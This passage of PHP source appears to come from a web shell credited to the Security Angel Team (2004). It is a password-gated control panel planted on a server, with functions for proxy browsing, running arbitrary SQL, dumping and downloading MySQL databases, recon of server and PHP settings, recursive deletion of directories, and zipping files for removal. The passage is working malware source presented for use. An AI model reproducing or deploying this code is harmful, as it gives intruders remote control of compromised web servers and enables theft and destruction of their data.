$tb->tdbody('<br><ul><li>用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.</li><li>用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.</li><li>用本功能浏览的 URL,在目标主机上留下的IP记录是 : '.$_SERVER['REMOTE_ADDR'].'</li></ul>','left');
$tb->tdbody('URL: '.$tb->makeinput('url','http://www.4ngel.net','','text','100').' '.$tb->makeinput('','浏览','','submit'),'center','1','40');
$tb->tdbody('<iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="http://www.4ngel.net"></iframe>');
echo "</form>";
$tb->tablefooter();
}//end proxy
elseif ($_GET['action'] == "sql") {
$action = '?action=sql';
$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
$dbpassword = $_POST['dbpassword'];
$dbname = $_POST['dbname'];
$sql_query = $_POST['sql_query'];
$tb->tableheader();
$tb->formheader($action,'执行 SQL 语句');
$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit'));
$tb->tdbody($tb->maketextarea('sql_query',$sql_query,'85','10'));
$tb->makehidden('do','query');
$tb->formfooter('1','30');
}//end sql query
elseif ($_GET['action'] == "sqlbak") {
$action = '?action=sqlbak';
$servername = isset($_POST['servername']) ? $_POST['servername'] : 'localhost';
$dbusername = isset($_POST['dbusername']) ? $_POST['dbusername'] : 'root';
$dbpassword = $_POST['dbpassword'];
$dbname = $_POST['dbname'];
$tb->tableheader();
$tb->formheader($action,'备份 MySQL 数据库');
$tb->tdbody('Host: '.$tb->makeinput('servername',$servername,'','text','20').' User: '.$tb->makeinput('dbusername',$dbusername,'','text','15').' Pass: '.$tb->makeinput('dbpassword',$dbpassword,'','text','15').' DB: '.$tb->makeinput('dbname',$dbname,'','text','15').' '.$tb->makeinput('connect','连接','','submit'));
@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname);
$tables = @mysql_list_tables($dbname);
while ($table = @mysql_fetch_row($tables)) {
$cachetables[$table[0]] = $table[0];
}
@mysql_free_result($tables);
if (empty($cachetables)) {
$tb->tdbody('<b>您没有连接数据库 or 当前数据库没有任何数据表</b>');
} else {
$tb->tdbody('<table border="0" cellpadding="3" cellspacing="1"><tr><td valign="top">请选择表:</td><td>'.$tb->makeselect(array('name'=>'table[]','option'=>$cachetables,'multiple'=>1,'size'=>15,'css'=>1)).'</td></tr><tr nowrap><td><input type="radio" name="backuptype" value="server" checked> 备份数据所保存的路径:</td><td>'.$tb->makeinput('path',$pathname.'/'.$_SERVER['HTTP_HOST'].'_MySQL.sql','','text','50').'</td></tr><tr nowrap><td colspan="2"><input type="radio" name="backuptype" value="download"> 直接下载到本地 (适合数据量较小的数据库)</td></tr></table>');
$tb->makehidden('do','backupmysql');
$tb->formfooter('0','30');
}
$tb->tablefooter();
@mysql_close();
}//end sql backup
elseif ($_GET['action'] == "phpenv") {
$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
$adminmail=(isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
if ($dis_func == "") {
$dis_func = "No";
}else {
$dis_func = str_replace(" ","<br>",$dis_func);
$dis_func = str_replace(",","<br>",$dis_func);
}
$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info = array(
0 => array("服务器时间",date("Y年m月d日 h:i:s",time())),
1 => array("服务器域名","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),
2 => array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),
3 => array("服务器操作系统",PHP_OS),
5 => array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
6 => array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),
7 => array("Web服务端口",$_SERVER['SERVER_PORT']),
8 => array("PHP运行方式",strtoupper(php_sapi_name())),
9 => array("PHP版本",PHP_VERSION),
10 => array("运行于安全模式",getphpcfg("safemode")),
11 => array("服务器管理员",$adminmail),
12 => array("本文件路径",__FILE__),
13 => array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen")),
14 => array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl")),
15 => array("显示错误信息 display_errors",getphpcfg("display_errors")),
16 => array("自动定义全局变量 register_globals",getphpcfg("register_globals")),
17 => array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc")),
18 => array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit")),
19 => array("POST最大字节数 post_max_size",getphpcfg("post_max_size")),
20 => array("允许最大上传文件 upload_max_filesize",$upsize),
21 => array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒"),
22 => array("被禁用的函数 disable_functions",$dis_func),
23 => array("phpinfo()",$phpinfo),
24 => array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
25 => array("图形处理 GD Library",getfun("imageline")),
26 => array("IMAP电子邮件系统",getfun("imap_close")),
27 => array("MySQL数据库",getfun("mysql_close")),
28 => array("SyBase数据库",getfun("sybase_close")),
29 => array("Oracle数据库",getfun("ora_close")),
30 => array("Oracle 8 数据库",getfun("OCILogOff")),
31 => array("PREL相容语法 PCRE",getfun("preg_match")),
32 => array("PDF文档支持",getfun("pdf_close")),
33 => array("Postgre SQL数据库",getfun("pg_close")),
34 => array("SNMP网络管理协议",getfun("snmpget")),
35 => array("压缩文件支持(Zlib)",getfun("gzclose")),
36 => array("XML解析",getfun("xml_set_object")),
37 => array("FTP",getfun("ftp_login")),
38 => array("ODBC数据库连接",getfun("odbc_close")),
39 => array("Session支持",getfun("session_start")),
40 => array("Socket支持",getfun("fsockopen")),
);
$tb->tableheader();
echo "<form action=\"?action=phpenv\" method=\"POST\">\n";
$tb->tdbody('<b>查看PHP配置参数状况</b>','left','1','30','style="padding-left: 5px;"');
$tb->tdbody('请输入配置参数(如:magic_quotes_gpc): '.$tb->makeinput('phpvarname','','','text','40').' '.$tb->makeinput('','查看','','submit'),'left','2','30','style="padding-left: 5px;"');
$tb->makehidden('do','viewphpvar');
echo "</form>\n";
$hp = array(0=> '服务器特性', 1=> 'PHP基本特性', 2=> '组件支持状况');
for ($a=0;$a<3;$a++) {
$tb->tdbody('<b>'.$hp[1].'</b>','left','1','30','style="padding-left: 5px;"');
?>
<tr class="secondalt">
<td>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<?php
if ($a==0) {
for($i=0;$i<=12;$i++) {
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
} elseif ($a == 1) {
for ($i=13;$i<=24;$i++) {
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
} elseif ($a == 2) {
for ($i=25;$i<=40;$i++) {
echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
}
}
?>
</table>
</td>
</tr>
<?php
}//for
echo "</table>";
}//end phpenv
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<tr>
<td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
<td align="right"><?php
debuginfo();
ob_end_flush();
?></td>
</tr>
</table>
</center>
</body>
</html>
<?php
/*======================================================
函数库
======================================================*/
// 登陆入口
function loginpage() {
?>
<style type="text/css">
input {font-family: "Verdana";font-size: "11px";BACKGROUND-COLOR: "#FFFFFF";height: "18px";border: "1px solid #666666";}
</style>
<form method="POST" action="">
<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
<input type="hidden" name="do" value="login">
<input type="submit" value="Login">
</form>
<?php
exit;
}//end loginpage()
// 页面调试信息
function debuginfo() {
global $starttime;
$mtime = explode(' ', microtime());
$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
echo "Processed in $totaltime second(s)";
}
// 去掉转义字符
function stripslashes_array(&$array) {
while(list($key,$var) = each($array)) {
if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
// 删除目录
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
return (@rmdir($deldir)) ? 1 : 0;
}
// 判断读写情况
function dir_writeable($dir) {
if (!is_dir($dir)) {
@mkdir($dir, 0777);
}
if(is_dir($dir)) {
if ($fp = @fopen("$dir/test.txt", 'w')) {
@fclose($fp);
@unlink("$dir/test.txt");
$writeable = 1;
} else {
$writeable = 0;
}
}
return $writeable;
}
// 表格行间的背景色替换
function getrowbg() {
global $bgcounter;
if ($bgcounter++%2==0) {
return "firstalt";
} else {
return "secondalt";
}
}
// 获取当前的文件系统路径
function getPath($mainpath, $relativepath) {
global $dir;
$mainpath_info = explode('/', $mainpath);
$relativepath_info = explode('/', $relativepath);
$relativepath_info_count = count($relativepath_info);
for ($i=0; $i<$relativepath_info_count; $i++) {
if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
if ($relativepath_info[$i] == '..') {
$mainpath_info_count = count($mainpath_info);
unset($mainpath_info[$mainpath_info_count-1]);
continue;
}
$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
} //end for
return implode('/', $mainpath_info);
}
// 检查PHP配置参数
function getphpcfg($varname) {
switch($result = get_cfg_var($varname)) {
case 0:
return "No";
break;
case 1:
return "Yes";
break;
default:
return $result;
break;
}
}
// 检查函数情况
function getfun($funName) {
return (false !== function_exists($funName)) ? "Yes" : "No";
}
// 压缩打包类
class PHPZip{
var $out='';
function PHPZip($dir) {
if (@function_exists('gzcompress')) {
$curdir = getcwd();
if (is_array($dir)) $filelist = $dir;
else{
$filelist=$this -> GetFileList($dir);//文件列表
foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
}
if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
else chdir($curdir);
if (count($filelist)>0){
foreach($filelist as $filename){
if (is_file($filename)){
$fd = fopen ($filename, "r");
$content = @fread ($fd, filesize ($filename));
fclose ($fd);
if (is_array($dir)) $filename = basename($filename);
$this -> addFile($content, $filename);
}
}
$this->out = $this -> file();
chdir($curdir);
}
return 1;
}
else return 0;
}
// 获得指定目录文件列表
function GetFileList($dir){
static $a;
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if($file!='.' && $file!='..'){
$f=$dir .'/'. $file;
if(is_dir($f)) $this->GetFileList($f);
$a[]=$f;
}
}